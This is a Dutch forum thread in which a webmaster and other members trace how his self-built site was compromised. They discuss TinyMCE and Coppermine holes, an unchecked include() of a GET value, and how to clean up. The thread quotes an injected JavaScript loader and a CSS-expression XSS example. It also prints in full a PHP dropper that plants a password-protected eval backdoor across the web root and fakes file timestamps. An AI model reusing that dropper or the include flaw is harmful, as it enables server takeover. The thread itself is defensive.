Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Site gehacked, maar hoe komt men binnen?

Pagina: 1
Acties:

zondag 4 mei 2008 01:46

Acties:

Verwijderd

Topicstarter
Heren,

Mijn hartelijke dank voor jullie topic hier. Ik heb hetzelfde probleem met de website die ik beheer en waar steeds de directory "ahenun" verschijnt. Daarin bevinden zich exact die bestanden die hierboven genoemd worden en ook het blogscherm wanneer je via een zoekmachine de site bezoekt, maar dan alleen vanaf 1 bepaalde subpagina.

Ik moet even melden dat mijn website volledig selfscripting is, en niet gebaseerd op joomla, mambo, xoops of welke sitesoftware dan ook. De enige uitzonderingen hierop zijn 2 scripts namelijk TinyMCE, een richtext editor voor internetformulieren, en Coppermine fotoalbum.

Samen met deze scripts was er nog 1 ander verdacht script, een uploadscript dat ik zelf geschreven heb. Waarom dit verdacht is? omdat juist die pagina waarin zich dat script bevind, een welliswaar beveiligde pagina waarvoor je expliciet toegangsrechten moet hebben, de enige pagina was die via de zoekmachine het blogscherm oproept.

De directory ahenun en inhoud moet via uploadrechten worden aangemaakt op de server. Aangezien ik in 2 weken tijd nu 4x al mijn passwords gewijzigd heb, en toch steeds weer die directory aantref, moet de dader dit dus via een andere weg doen. Dat kan zijn via de hosting provider (in dit geval Lycos) of via een script dat de toegangsrechten kent, en dat is het uploadscript. Dit script heb ik nu ge-boobytrapped, zodra er iets mee wordt geuploaded weet ik dat binnen enkele minuten.

Ik ben via jullie opmerkingen over de ccs en htaccess bestanden het ellendeding verder op het spoor gekomen. Werkelijk alle css scripts zijn aangepast. Ook hier geld dat alleen met uploadrechten tot de server kunnen de scripts worden vervangen. Wederom komt het uploadscript boven drijven, en wederom blijft de provider verdacht.

Het fotoalbum is offline gehaald, de rte editor tinymce idem. Mocht nu de hacker het uploadscript gebruiken heb ik zijn gegevens te pakken, en als het virus nu weer verschijnt zonder dat er meldingen van zijn, dan kan het alleen nog via de provider komen die dan op een stevige email kan rekenen. Temeer daar ik hun meerdere malen verzocht heb na te gaan welk IPadres verantwoordelijk is voor de plaatsing van bepaalde bestanden op een specifiek tijdstip en men mij daar nog steeds geen antwoord op heeft gegeven.

Terugkomend op het virus (want zo noem ik het) :
  • - het wordt illegaal geuploaded, dus moet de dader uploadrechten hebben
  • - Het verschijnt zelfs op websites die geheel zelfbouw zijn, waarbij de gebruikte beveiligingstechniek was uitgerust met speciale logging die emailmelding maakt van illegale acties en opslag in een database doet van alle actie, en daarin is NIETS terug te vinden van de plaatsing van de malifide scripts en css files
  • - Het verschijnt op willekeurige tijdstippen
  • - sporen in de bestanden wijzen op een IPadres in Brazilie.
  • - Kenmerk : in de besmette css files komt altijd het volgende tekstfragment voor : "expression(eval(unescape" waarmee je de besmette bestanden snel kunt opsporen.
Maak zodra je de besmetting hebt weggehaald een hele strakke backup van je website, en kijk dagelijks op de server of de vremde directory terug is. Zodra dat zo is, dan meteen verwijderen en alle css bestanden vervangen door die uit je backup.
En ga na HOE de hacker dit allemaal kan doen. Ik denk eerlijk gezegd dat de providers zelf besmet zijn en dat er via cross-link besmetting websites besmet worden.

Ron

zondag 4 mei 2008 04:19

Acties:
  • tijntjethf
  • Registratie: April 2003
  • Laatst online: 23:14

tijntjethf

Uit de vorige posts zie ik ook een aantal keer de tinyMCE directory langskomen.. grote kans dat daar het probleem zit dus :)

zondag 4 mei 2008 12:37

Acties:
  • Exhar
  • Registratie: Februari 2007
  • Niet online

Exhar

TRON schreef op zaterdag 02 februari 2008 @ 18:12:
En dit staat er in het script:

if (!document.getElementById('JSSS')){ JSS1 = 54; JSS2 = 84046; JSS3 = '/houtduif/mambots/editors/tinymce/jscripts/tiny_mce/halupav/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/houtduif/mambots/editors/tinymce/jscripts/tiny_mce/halupav/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
Verwijderd schreef op zondag 04 mei 2008 @ 01:46:
Ik moet even melden dat pghoofddorp.nl volledig selfscripting is, en niet gebaseerd op joomla, mambo, xoops of welke sitesoftware dan ook. De enige uitzonderingen hierop zijn 2 scripts namelijk TinyMCE, een richtext editor voor internetformulieren, en Coppermine fotoalbum.
Zie je het verband? >:)

zondag 4 mei 2008 18:11

Acties:
  • BlackWhizz
  • Registratie: September 2004
  • Laatst online: 29-11 21:31

BlackWhizz

Jouw pagina systeem is ook niet lekker.
http://www.cpu-info.com/i...epaginadiewrssnietbestaat

Die bestaat niet, maar ik krijg php errors voorgeschoteld, en da's niet goed.

zondag 4 mei 2008 18:28

Acties:
  • BCC
  • Registratie: Juli 2000
  • Laatst online: 21:10

BCC

Exhar schreef op zondag 04 mei 2008 @ 12:37:
[...]

Zie je het verband? >:)
TinyMCE, ik wou het ook net opperen. En aangezien je met Tiny files kan uploaden, lijkt me het handig om te kijken of je php bestanden kan uploaden en of ze vervolgens executable zijn. Er zijn genoeg exploits bekend iig van zowel TinyMCE als IMCE (de uploader): http://webapp.iss.net/Sea...e&searchType=vuln&x=0&y=0

[ Voor 18% gewijzigd door BCC op 04-05-2008 18:38 ]

Na betaling van een licentievergoeding van €1.000 verkrijgen bedrijven het recht om deze post te gebruiken voor het trainen van artificiële intelligentiesystemen.

zondag 4 mei 2008 18:40

Acties:
  • Tofu
  • Registratie: Maart 2003
  • Laatst online: 05-10-2024

Tofu

Een browser gaat normaal gezien toch geen javascript code uit een .css bestand gaan uitvoeren?

zondag 4 mei 2008 18:41

Acties:
  • BCC
  • Registratie: Juli 2000
  • Laatst online: 21:10

BCC

Tofu schreef op zondag 04 mei 2008 @ 18:40:
Een browser gaat normaal gezien toch geen javascript code uit een .css bestand gaan uitvoeren?
IE wel, die voert zelfs javascript in plaatjes uit (nieuws: XSS-exploit door Microsoft betiteld als 'by design') maar ook css:
code:
1

<div style="width: expression(alert('gotcha'))">pure innocence</div>

You gotta love it :)

[ Voor 15% gewijzigd door BCC op 04-05-2008 18:46 ]

Na betaling van een licentievergoeding van €1.000 verkrijgen bedrijven het recht om deze post te gebruiken voor het trainen van artificiële intelligentiesystemen.

zondag 4 mei 2008 18:57

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

zorg er ook voor dat je beveiligde pagina waarvoor je speciaal moet ingelogd zijn via .htaccess en robot.txt niet meer mbv zoekmachine's vindbaar is.

dan moet een hacker zelf al langskomen met een spider ipv met zijn scriptje even google-resultaten afgaan en ze 1 voor 1 'infecteren'

als het kan ook aparte rechten geven aan mappen: waar men geen bestanden moet kunnen uploaden ook geen schrijfrechten toekennen aan de 'website'-user (het webserver-proces draait best onder zijn eigen gebruiker die zeer beperkt is in rechten), execute-rechten zo al ontnemen, ....

en ja, je logs nakijken want je zit ergens met de mogelijk om html-/script-injectie's te doen in.
eventueel ook even je hoster waarschuwen want het kan ook zijn dat een ander script op die server misbruikt wordt.
- het wordt illegaal geuploaded, dus moet de dader uploadrechten hebben
Hoeft niet, hij moet enkel een pagina weten te misbruiken die uploadrechten heeft
- Het verschijnt zelfs op websites die geheel zelfbouw zijn, waarbij de gebruikte beveiligingstechniek was uitgerust met speciale logging die emailmelding maakt van illegale acties en opslag in een database doet van alle actie, en daarin is NIETS terug te vinden van de plaatsing van de malifide scripts en css files
beveiliging via javascript of in je php-script? client-side of server-side dus: vertrouw nooit de client en een upload-pagina kan rechtstreeks aangesproken worden vanaf een willekeurige andere pagina die de hacker ev. zelf even in elkaar steekt, maw gebruik zoveel mogelijke beveiliging in je php-script: check de referrer: komt de request idd vanaf je eigen upload-pagina, is men even bezig geweest op die pagina - een upload-request 1 seconde nadat die pagina is opgevraagd is ook verdacht - op die tijd heb jij geen copy-past + click gedaan...: gebeurd dat wel: ip-adres bannen en via dat script je een mail laten toesturen om maar enkele tips te geven die
- Het verschijnt op willekeurige tijdstippen
spambotjes, ...
- sporen in de bestanden wijzen op een IPadres in Brazilie.
waarschijnlijk een logger om te kijken wie er allemaal komt kijken om bij te houden hoe effectief de 'injectie' was
- Kenmerk : in de besmette css files komt altijd het volgende tekstfragment voor : "expression(eval(unescape" waarmee je de besmette bestanden snel kunt opsporen.
dat gaat idd zo zijn, tot ze het beter verbergen of een combinatie van vbscript en javascript gaan gebruiken - maar zelfs dan heb je ergens stukken tekst die de unescape moeten gaan doen

[ Voor 53% gewijzigd door soulrider op 04-05-2008 19:07 ]

zondag 4 mei 2008 23:56

Acties:

Verwijderd

Topicstarter
Vervolg op mijn voorgaande bericht.

De hex-codering die in alle css bestanden is aangetroffen heb ik weten te ontcijferen. Deze code bevat een opdrachtregel in javascript die controleert of de directory met bestanden (in mijn geval genaamd ahenun, maar kan diverse namen hebben) aanwezig is, en zoniet dan wordt deze aangemaakt. Deze regel wordt alleen actief als de bezoeker via een searchengine de website benadert, of wanneer een zoekmachine zelf je site benadert om eventuele keywords te updaten.

Het ziet er naar uit dat in eerste instantie het volledig verwijderen van al de coderingen in css files en de komplete driectory met illegale bestanden het virus verwijderd is. JE moet echter ook onderzoeken waar zich de bron bevind waarlangs het in eerste instantie op je website tercht is gekomen. In mijn geval bleek Coppermine v1.4.13 de schuldige, maar ook de tinyMCE editor blijft verdacht zolang deze niet tot de laatste versie is geupgraded (versie 3.x)

TinyMCE bevind zich ook in paketten als joomla, xoops etc. Dat geld ook voor coppermine-plugins voor genoemde software. Controleer of deze zijn geupgraded tot de laatste versies, want in de oudere versies ervan zit de bug die de oorzaak is van dit vervelende virus.

Ron

maandag 5 mei 2008 00:09

Acties:

Verwijderd

Topicstarter
soulrider schreef op zondag 04 mei 2008 @ 18:57:
zorg er ook voor dat je beveiligde pagina waarvoor je speciaal moet ingelogd zijn via .htaccess en robot.txt niet meer mbv zoekmachine's vindbaar is.

dan moet een hacker zelf al langskomen met een spider ipv met zijn scriptje even google-resultaten afgaan en ze 1 voor 1 'infecteren'

als het kan ook aparte rechten geven aan mappen: waar men geen bestanden moet kunnen uploaden ook geen schrijfrechten toekennen aan de 'website'-user (het webserver-proces draait best onder zijn eigen gebruiker die zeer beperkt is in rechten), execute-rechten zo al ontnemen, ....

en ja, je logs nakijken want je zit ergens met de mogelijk om html-/script-injectie's te doen in.
eventueel ook even je hoster waarschuwen want het kan ook zijn dat een ander script op die server misbruikt wordt.


[...]
Dank voor je uitleg.
Inderdaad zijn pagina's met uploadrechten verdacht. Mijn beveiliging en logging vind serversided plaats dus op basis van php. Client sided vertrouw ik sowieso niet echt.
Ik heb na jullkie reacties mbt het tiny verhaal ook daar eens in gekeken, het is offline nu bij mij, maar inderdaad zitten daarin plugins die uploaden van bestanden mogelijk maken.

één daarvan is ibrowser, dat appart moet worden gedownloaded. Met ibrowser kunnen redacteuren fotomateriaal in de tekst uploaden. Met name in ibrowser heb ik sporen ontdekt die mogelijkerwijs(!) de toegang voor dit "virus" hebben gecreëeerd. Let wel, dit is niet met zekerheid!

Je tips mbt de referercheck op de uploadpagina zijn waardevol. Bedankt! hiermee ga ik zeker verder aan de slag. Nu log ik iedere actie inclusief de referer, dus in feite kan ik de informatie er handmatig mee uitlezen uit de logging database. Automatisch en per email is nog mooier.
ik geef je ook nog even mee: ook die referrer kan misbruikt worden zodra ze weten dat die ergens gelogd/gemaild wordt, dus bouw ook daar enige beveiliging in en doe niet zomaar
"log($_SERVER[referrer])" naar een een bestand ergens in je html-root
of nog erger: die rechtstreeks in je mail() gebruiken: een extra cc of bcc is er dan zo ingezet als je niet oppast.
Volkomen terechte opmerking. Ik log gelukkig niet op die manier. Natuurlijk is de string $_SERVER["REFERER"] wel in gebruik, maar die info wordt eerst naar een ander formulier gepost dat na controle voor verdere verwerking zorgt. De logfile staat ook zeker niet in de root. Ook daar heb ik wat anders voor bedacht en dat werkt goed. Ik blijf alert op misbruik uiteraard

Wie de hexcode uit de css files even decodeert met de ASCII tabel, ziet de volgende tekst verschijnen :
if (!document.getElementById('JSSS')) { JSS1 = 59; JSS2 = 586391; JSS3 = '/ahenun/dummy.htm'; var js = document.createElement('script') ...... etc
Het helemaal overtikken is me ff te lang. maar je ziet hierin als je de hele tekst neemt helder een script dat de genoemde bestanden in de illegale directory aanspreekt danwel aanmaakt wanneer zij ontbreken. Dat gebeurt op het moment dat iemand via een bepaalde referer de website bezoekt. henun is overigens de naam die de dir bij mij steeds kreeg, ik zag in deze threat al een andere benaming langskomen dus die naam kan verschillen.

Als ik meer info vind, dan laat ik dit uiteraard weten.

Ron

[ Voor 12% gewijzigd door Verwijderd op 05-05-2008 00:53 ]

maandag 5 mei 2008 00:15

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

dat ontcijferen is makkelijk te doen door de eval(... te veranderen in alert(...
en je krijgt de code in een pop-up (zo deed ik dat, nu is het via een een aangepaste pagina die ik heb: in een tekstvak ernaast...)

je hebt geen virus, je hebt een code-injectie gehad op je server.
maw: een exploit op een script dat misbruikt kon worden om code (html, css, js, ...) te injecteren omdat je niet de nieuwste versie had draaien. (makkelijk mbv een bot en bijna elke willekeurige zoekmachine)

maar toch alvast bedankt om de informatie te posten hoe ze 't gelukt is bij jouw site, dan weten de volgenden met hetzelfde probleem waar ze moeten gaan zoeken.

ik geef je ook nog even mee: ook die referrer kan misbruikt worden zodra ze weten dat die ergens gelogd/gemaild wordt, dus bouw ook daar enige beveiliging in en doe niet zomaar
"log($_SERVER[referrer])" naar een een bestand ergens in je html-root
of nog erger: die rechtstreeks in je mail() gebruiken: een extra cc of bcc is er dan zo ingezet als je niet oppast.

ps: als je zulke dingen vindt in scripts die nog geen update hebt: meld het naar de ontwikkelaar.
en gebruik eventueel in de tussentijd een oplossing die ik toepas: via .htaccess naar een eigen php-script sturen dat alles controleerd en ev. limiteerd qua throughput en het dan pas naar het originele script stuurt dat in de tussentijd een .htaccess : deny all meekrijgt. (mijn php kan via het file-systeem er nog aan en het includen)

pps: zoals je merkt is er een edit knop ter voorkoming van vaak meerdere posts onder elkaar te moeten maken

[ Voor 46% gewijzigd door soulrider op 05-05-2008 00:26 ]

maandag 5 mei 2008 00:15

Acties:

Verwijderd

Topicstarter
Exhar schreef op zondag 04 mei 2008 @ 12:37:
[...]


[...]


Zie je het verband? >:)
Jazeker.
En van tiny is nu een versie 3.x uit waarbij men meld dat "bepaalde bugs" zijn opglost. Of onze bug erbij zit zeggen ze niet. Dat wordt onderzoeken!

Ron

maandag 5 mei 2008 00:17

Acties:

Verwijderd

Topicstarter
soulrider schreef op maandag 05 mei 2008 @ 00:15:
dat ontcijferen is makkelijk te doen door de eval(... te veranderen in alert(...
en je krijgt de code in een pop-up
(of zoals ik een aangepaste pagina heb: in een tekstvak ernaast...)

je hebt geen virus, je hebt een code-injectie gehad op je server.

maw: een exploit op een script dat misbruikt kon worden om code (html, css, js, ...) te injecteren omdat je niet de nieuwste versie had draaien. (makkelijk mbv een bot en bijna elke willekeurige zoekmachine)

maar toch alvast bedankt om de informatie te posten hoe ze 't gelukt is bij jouw site, dan weten de volgenden met hetzelfde probleem waar ze moeten gaan zoeken.
Dank voor de info. Inderdaad geen virus, maar zo noem ik het voor het gemak.

Het posten doe ik juist omdat ik door deze threat op dit forum het ding bij het nekvel kon pakken op mijn site. Dus dan is terug geven hoe het verder verlopen is een kleine moeite vind ik.
Ron

maandag 5 mei 2008 09:10

Acties:
  • BlackWhizz
  • Registratie: September 2004
  • Laatst online: 29-11 21:31

BlackWhizz

Kun je via SQL injections inloggen in het admin panel? *knip*. Zo ja, dan is het vrij simpel, waarschijnlijk heb je in tinymce uploadfunctie. Volgens mij kun je daar zo alle bestanden naar binnen jenken.

Dat gaan we toch maar niet doen. ;)

[ Voor 20% gewijzigd door pasta op 05-05-2008 14:22 ]

maandag 5 mei 2008 14:22

Acties:
  • pasta
  • Registratie: September 2002
  • Laatst online: 12-01 14:16

pasta

Ondertitel

Ik heb dit even afgesplitst omdat het wel een nieuw topic verdient.

offtopic:
Ron_43, we doen hier op GoT continue de groeten, je naam onder je post zetten is dus niet nodig. ;)

Signature

dinsdag 6 mei 2008 11:10

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

Dit is typische een geval van of XSS of code injection.
men heeft een form op je site een bepaalde string gevoerd die niet geod geescaped word door de site en bingo de code word uit gevoerd.
deze code verandert wat aan je site in dit geval een bestandje van tinymce of coppermine.
en die aanpassing heeft ervoor gezorgd dat een bezoek aan de site een shitload aan bestanden binnen haalt en zo mogelijk uitvoerd.
en zo komt men binnen in je site

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

dinsdag 6 mei 2008 22:47

Acties:

Verwijderd

Topicstarter
[code injection]
Nou, het lijkt mij dat het inderdaad zo moet zijn gebeurd.
Ik had enige maanden geleden een spammer die mijn pagina-aanroepen misbruikte om spam te verzenden. Ik had daar een klein dom lekje in het beveiligen over het hoofd gezien waardoor men binnen enkele pagina's van de website een eigen script kon opstarten. Ik vermoed dat ook op dat moment de besmetting is ontstaan die nu deze vreemde directory opleverde met die vreemde blog erin.

Die mogelijkheid heb ik indertijd geblokt, een poging op die wijze scripts te runnen wordt nu gedetecteerd en gelogd. De laatste dagen is het op die manier weer enkele malen geprobeerd, eigenlijk sinds de dag dat ik alle malifide scripts weggehaald had. Overigens is de vreemde directory niet meer teruggekomen na de schoning van alle css bestanden.

[ Voor 9% gewijzigd door Verwijderd op 06-05-2008 22:54 ]

dinsdag 6 mei 2008 22:54

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

zij weten natuurlijk dat je site niet meer hun pagina weergeeft, want de vervangende pagina heeft hoogstwaarschijnlijk een unieke stats-counter (eigen ontwikkeling van 'hackers' of eentje van google ofzo) en daarmee dat ze nu pogingen ondernemen om hun script opnieuw te injecteren in je pagina.

(zeer hoog vermoeden dat dit een 'black hat seo"-operatie is die zo goed mogelijk geautomatiseerd is via scripts/botjes/..., om een andere site omhoog te pushen in de hitlijsten...)

in ieder geval: netjes dat je het 'gat' gevonden hebt en er een extra 'anti-dievenklem' opgezet hebt, maar de kans is vrij groot dat ze wel pogingen blijven ondernemen tot ze weer een gaatje vinden.(nu nog automatisch de bestaande 'exploit' uit blijven proberen, en zodra er een nieuwe bestaat die ook proberen)

maw: hou je pagina's en logs in het oog, en plaats bv ergens een proxy-scriptje waar je een vaste referrer inzet van 1 der searchengine's kan je steeds vrij eenvoudig een check doen ;)
(ik gebruik een script met onbekende OS en een zelf verzonnen browser in de headers om mogelijke onveilige pagina's te bekijken in code - geen target-exploits mogelijk - uitbreiding om automatisch links en scripts te strippen uit de weergave maar niet uit de code-weergave is onderweg)

ps: misschien kan je je oplossing (of het idee) delen? al dan niet via de tine-mce-ontwikkelaars-site/-forum ? (voor zij die 't zelfde meemaken maar geen update mogelijkheid hebben, maar wel met extra scripts enzo kunnen spelen)
(ik gebruik geen tiny_mce, dus ik ben al blij dat de hier aangebrachte ideetjes je hielpen het probleem in te dijken/op te lossen)

edit2: thanx voor de info, was dus geen tiny_mce inbreuk zoals ik begreep, maar een misbruik van je eigen code waar je niet controleerde of de get-waarde idd wel een eigen pagina of verwachte waarde was. wijze les en nog steeds netjes opgelost. (ik gebruik zo ook ergens een soortgelijke toepassing, om html-pagina's uit een template-folder (niet in doc-root) te halen - input strippen van alle zotte tekens en als het dan nog steeds geen 'template'-file is, krijgt men de eerste/vorige terug te zien, geen onmiddellijke feedback dat 't niet gelukt is)
als webmaster steeds achterdochtig zijn tegenover je bezokers:
mbv bv javascript kan je het idiootproof maken (nette melding dat men iets vergeten is bv)
('idioot' moet je hier lezen als 'een bezoeker die per ongeluk een typfoutje maakt in 1 der inputvelden of url')
met checks in je eigen serverside-scripts maak je het hackerproof ('hacker' hier in de eigenlijk foutieve betekenis van 'bezoeker die moedwillig je script wilt misbruiken om jou en/of anderen schade toe te brengen')
- weer een site wat veiliger gemaakt en een webmaster wat meer security-mindend :D

[ Voor 82% gewijzigd door soulrider op 06-05-2008 23:48 ]

dinsdag 6 mei 2008 23:35

Acties:

Verwijderd

Topicstarter
soulrider schreef op dinsdag 06 mei 2008 @ 22:54:
ps: misschien kan je je oplossing (of het idee) delen? al dan niet via de tine-mce-ontwikkelaars-site/-forum ? (voor zij die 't zelfde meemaken maar geen update mogelijkheid hebben, maar wel met extra scripts enzo kunnen spelen)
(ik gebruik geen tiny_mce, dus ik ben al blij dat de hier aangebrachte ideetjes je hielpen het probleem in te dijken/op te lossen)
Tiny heeft onlangs versie 3.x uitgebracht. Die lijkt nu bestand tegen het huidige probleem. Toch denk ik dat mijn eigen lek in d ebeveiliging de eerste aanzet geweest is. Een andere website die ik beheer en ook tiny gebruikt heeft geen last en bestaat al ruim 3 jaar langer.

Mijn probleem was dat ik in de hoofdpagina van de website een aantal andere pagina's oproep. Daarmee is de website dynamisch. Zo kan ik het menu aan de linkerkant sturen aan de hand van de aanroepende url, en het middengebied ook. Juist daarin maakte ik een fout, het middengebied werd aangeroepen met de toevoeging aan de url .......php?doel=pagina.php&menu=......... met name de tag doel, die met een GET routine in de volgende pagina werd uitgelezen en met een INCLUDE($doel); commando de juiste pagina toonde, kon gewoon de url naar een pagina of script overal op het internet bevatten zonder dat de website daar moeilijk over deed.
Op die manier hebben ze een aantal malen een pagina gerund die een script bevatte die via de phpmailer van mijn server enorme ladingen spam verzond. Door een waarschuwing van mijn provider kwam ik daar achter, via een statistieken logger zag ik hoe ze het flikten.

De oplossing was simpel, zorg dat die string "doel" eerst wordt gecontroleerd of de aangeroepen pagina binnen de eigen domeinomgeving staat of van buitenaf afkomstig is. Dat kan op meerdere manieren varierend van controle van de naam (bestaat die exact zo op de server) tot en met random ID's in de pagina's. Is de pagina niet van het eigen domein, dan volgt een exit(); nadat eerst een aantal zaken wortd uitgelezen en gelogd. De "dader" krijgt ipv de gevraagde pagina nu een pagina met een waarschuwing en het uitgelezen IPnummer te zien.
Hetzelfde gold ook overigens voor de get variabele menu= .

Ik heb vandaag een aantal van de lezers hier ook in de logfiles langs zien komen om dergelijke methodes eens te testen :-)

Ik vermoed dus dat op die manier ook de scriptcode binnen de domeinnaam is uitgevoerd die de uiteindelijke besmetting van de css files heeft veroorzaakt. En die besmette files konden vervolgens zelf steeds de illegale code die ik delete weer aanmaken.

woensdag 7 mei 2008 20:04

Acties:
  • sanzut
  • Registratie: December 2006
  • Laatst online: 20:58

sanzut

It's always christmas time

"expression(eval(unescape" waarmee je de besmette bestanden snel kunt opsporen.
Loop je hele website eens na, en kijk waar eval wordt gebruikt. Dit is mogelijk een van de boosdoeners.
Een andere mogelijkheid is natuurlijk om de pagina waar het upload script zich bevindeen nieuwe, absoluut onlogische naam te geven. 45rfty6uh09.php bijvoorbeeld(in dit geval met beleid op je toetsenbord slaan met je hoofd. En dan zorgen dat je die URL gewoon ergens in je favorieten oid neerzet.

woensdag 7 mei 2008 22:17

Acties:
  • BCC
  • Registratie: Juli 2000
  • Laatst online: 21:10

BCC

sanzut schreef op woensdag 07 mei 2008 @ 20:04:
[...]
Een andere mogelijkheid is natuurlijk om de pagina waar het upload script zich bevindeen nieuwe, absoluut onlogische naam te geven. 45rfty6uh09.php bijvoorbeeld(in dit geval met beleid op je toetsenbord slaan met je hoofd. En dan zorgen dat je die URL gewoon ergens in je favorieten oid neerzet.
Security by obscurity is nooit een oplossing. Daarnaast weet google het eigenlijk altijd wel weer te vinden.

Na betaling van een licentievergoeding van €1.000 verkrijgen bedrijven het recht om deze post te gebruiken voor het trainen van artificiële intelligentiesystemen.

donderdag 8 mei 2008 01:37

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

idd, alles wat gelinkt is via een andere pagina kan gevonden worden mbv een spider.
hoeft niet die van google te zijn, als je pagina interessant genoeg is, dan schrijven ze wel een spider voor jou site.

en is het niet gelinkt, dan is het nog vindbaar mbv een toolbar in je browser/ spyware/ sniffers/ compromised proxy/....

woensdag 14 mei 2008 17:09

Acties:

Verwijderd

Topicstarter
Beste mensen,

Ruim 120 maal per dag wordt er nog steeds geprobeerd via die $_GET waarde mijn website te hacken. (zie eerdere berichten in dit topic voor nadere uitleg).

De gebruikte URL verschilt per dag. Vandaag was het http://www.thoseguysfilms...ver/images/timuji/ehur/a/

Met name de laatste drie segmenten /timuji/ehur/a/ komen elke dag terug, de link ervoor niet. De website waar deze url naar verwijst is vaak een gewone onschuldige website, zo was laatst een website van een dierenarts in Duistland, een website over modelspoorbouw in engeland en dergelijke gebruikt om die drie segmenten aan toe te voegen.

Als je die link volgt (ik heb hier een extra pc die niets belangrijks bevat en waarmee ik dat aandurf, ik formatteer de hele schijf regelmatig en zet er dan opnieuw winxp weer op) volgt geen virusmelding of spywaremelding maar een ogenschijnlijk lege pagina. Ogenschijnlijk want als je omlaag scrollt en naar rechts staat de volgende scriptcode in het midden van de pagina vermeld :

code:
1

<?php error_reporting(1);global $HTTP_SERVER_VARS; $START = time(); $WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0); function my_fwrite($f,$data) { global $CURFILE; $file_mtime = @filemtime($f); $file_atime = @fileatime($f); $dir_mtime = @filemtime(@dirname($f)); $dir_atime = @fileatime(@dirname($f)); if ($file_h = @fopen($f,"wb")){ @fwrite($file_h,$data); @fclose($file_h); if ($file_mtime){ @touch($f,$file_mtime,$file_atime); }elseif(@filemtime($CURFILE)){ @chmod($f,@fileperms($CURFILE)); @touch($f,@filemtime($CURFILE),@fileatime($CURFILE)); @chgrp($f,@filegroup($CURFILE)); @chown($f,@fileowner($CURFILE)); }; if ($dir_mtime) @touch(@dirname($f),$dir_mtime,$dir_atime); return $f; }else{ return ''; }; }; function ext($f){ return substr($f, strrpos($f, ".") + 1); }; function walkdir($p,$func='_walkdir',$l=0){ global $START; global $WD_TIMEOUT; global $FL; $func_f = "{$func}_f"; $func_d = "{$func}_d"; $func_s = "{$func}_s"; $func_e = "{$func}_e"; if ($dh = @opendir("$p")){ if (function_exists($func_s)) { if ($func_s($p,$l)) return 1; }; while ($f = @readdir($dh)){ if (time() - $START >= $WD_TIMEOUT[$l] ) break; if ($f == '.' || $f == '..' ) continue; if (@is_dir ("$p$f/") ) walkdir("$p$f/",$func,$l+1); if (@is_dir ("$p$f/") && function_exists($func_d)) $func_d("$p$f/",$l); if (@is_file("$p$f" ) && function_exists($func_f)) $func_f("$p$f" ,$l); }; closedir($dh); if (function_exists($func_e)) $func_e($p,$l); }; }; function r_cut($p){ global $R; return substr($p,strlen($R)); }; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; $R = $HTTP_SERVER_VARS['DOCUMENT_ROOT']; $CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME']; echo "<pre>"; testdata('start'); $fe = ext($CURFILE); if (!$fe) $fe = 'php'; $FN = "namogofer.$fe"; function _walkdir_s($d,$l) { global $FCNT; $FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0); }; function _walkdir_d($d,$l) { global $FCNT; $FCNT['dir' ]++; }; function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++; if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; }; function _walkdir_e($d,$l) { global $C,$FCNT,$FN; if ($C[$l]<7){ if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+').str_repeat(' ',150)."\n".str_repeat("\n",100))){ $C[$l]++; $FCNT['fn'] = r_cut("$d$FN"); say(implode("\t",$FCNT)); }; }; }; walkdir("$R/"); testdata('end'); echo "</pre>"; ?>

Ik heb de indruk dat men met dit soort scripts bezig is de server te proberen en testen op eventuele lekken. Met name de error_reporting(1) functie, die gedurende de running van het script actief blijft en die errors die normaal onzichtbaar blijven nu weergeeft geeft mij die indruk.
De pogingen komen steeds van een ander IPnummer en zelfs 0.0.0.0 en 127.0.0.1 komen daar regelmatig in voor.

Graag van jullie een deskundige mening hierover. Mijn vraag is tweeledig :

- ben ik nog goed beveiligd, want door mijn beveiliging op de $_GET waarde die alleen nog pagina's in het websitedomein mag bevatten, worden deze pogingen steeds tegengehouden en gelogd (vandaar dat ik bovenstaande info heb). Moet ik iets speciaal in de gaten houden en gaan beveiligien?

- Hoe kom ik erachter wie dit steeds presteert, Het begint ons goed de keel uit te hangen.

Graag jullie meningen en suggesties, laten we er een leerzame discussie van maken!

donderdag 15 mei 2008 15:38

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

in het gedeelte
code:
1

